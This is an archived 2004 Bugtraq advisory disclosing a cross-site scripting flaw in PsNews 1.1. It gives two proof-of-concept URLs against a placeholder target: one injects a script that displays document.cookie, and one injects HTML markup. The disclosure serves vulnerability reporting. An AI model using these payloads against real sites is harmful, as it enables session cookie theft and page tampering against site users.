lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20040905185524.32251.qmail@www.securityfocus.com>
Date: 5 Sep 2004 18:55:24 -0000
From: Michal Blaszczak <wacky@...ponie.org>
To: bugtraq@...urityfocus.com
Subject: Bug XSS in PsNews 1.1




°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
*5-9-2004
*Autor: wacky
*E-mail: wacky@...ponie.org
*WWW: http://www.nicponie.org
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
-----------------------------------------------
|BugCross-Site Scripting (XSS) w PsNews 1.1 | 
-----------------------------------------------

Exploit:

a) 
http://[target]/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script>

b)
http://[target]/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font>

°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
http://www.nicponie.org/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ